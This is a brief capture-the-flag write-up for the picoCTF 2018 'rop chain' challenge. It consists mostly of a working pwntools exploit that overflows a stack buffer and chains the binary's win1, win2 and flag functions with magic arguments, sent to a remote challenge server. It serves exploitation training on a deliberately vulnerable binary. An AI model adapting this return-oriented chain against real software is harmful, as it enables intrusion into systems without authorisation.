pwn | picoctf_2018_rop chain
栈溢出，利用方式为 ret2text。
exp:
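from pwn import *

context.log_level = 'debug'

# Addresses taken from the challenge binary (32-bit, 0x0804xxxx text segment).
# Hard-coding them only works because the binary is not position-independent;
# with PIE/ASLR the text base would have to be leaked first — TODO confirm with checksec.
p_vuln = 0x08048714  # vulnerable function; kept for reference, not used in the chain
p_win1 = 0x080485CB
p_win2 = 0x080485D8
p_flag = 0x0804862B

# Distance from the start of the overflowed buffer to the saved return address:
# 0x18 bytes of buffer plus 4 bytes of saved EBP (32-bit frame). Verify against
# the disassembly of the vulnerable function before reusing on another build.
PADDING = b'M' * (0x18 + 4)

# ret2text chain, read top-down as the stack looks after the overflow:
#   saved EIP      -> win1
#   win1's return  -> win2
#   win2's return  -> flag, win2's first argument = 0xBAAAAAAD
#   flag's return  -> 0xBAAAAAAD (never meant to be reached), flag's first argument = 0xDEADBAAD
# The two magic values are presumably what win2 and flag compare their argument
# against — confirm in the binary. No canary value is written, so this layout
# only works if nothing sits between the buffer and the saved EIP (no stack protector).
payload = (
    PADDING
    + p32(p_win1)
    + p32(p_win2)
    + p32(p_flag)
    + p32(0xBAAAAAAD)
    + p32(0xDEADBAAD)
)

# p = process('./PicoCTF_2018_rop_chain')  # local run against the same binary
# pwntools tubes are context managers, so the socket is closed even if a
# send/recv raises instead of falling through to interactive().
with remote('node4.buuoj.cn', 26914) as p:
    # Match the prompt as bytes, consistent with the bytes payload (pwntools
    # warns when a str is passed here).
    p.recvuntil(b'input> ')
    p.sendline(payload)
    p.interactive()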